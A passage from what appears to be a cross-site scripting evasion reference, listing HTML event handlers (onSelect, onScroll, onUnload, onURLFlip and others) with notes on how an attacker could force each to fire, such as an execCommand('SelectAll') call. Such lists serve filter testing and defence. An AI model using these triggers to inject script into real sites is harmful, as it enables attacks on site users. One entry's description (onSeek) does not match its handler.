89.	onRowInserted() (user or attacker would need to insert a row in a data source) 
90.	onScroll() (user would need to scroll, or attacker could use the scrollBy() function) 
91.	onSeek() (the onreverse event fires when the timeline is set to play in any direction other than forward) 
92.	onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");) 
93.	onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");) 
94.	onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");) 
95.	onStart() (fires at the beginning of each marquee loop) 
96.	onStop() (user would need to press the stop button or leave the webpage) 
97.	onStorage() (storage area changed) 
98.	onSyncRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire) 
99.	onSubmit() (requires attacker or user submits a form) 
100.	onTimeError() (user or attacker sets a time property, such as dur, to an invalid value) 
101.	onTrackChange() (user or attacker changes track in a playList) 
102.	onUndo() (user went backward in undo transaction history) 
103.	onUnload() (as the user clicks any link or presses the back button or attacker forces a click) 
104.	onURLFlip() (this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file) 
105.	seekSegmentTime() (this is a method that locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)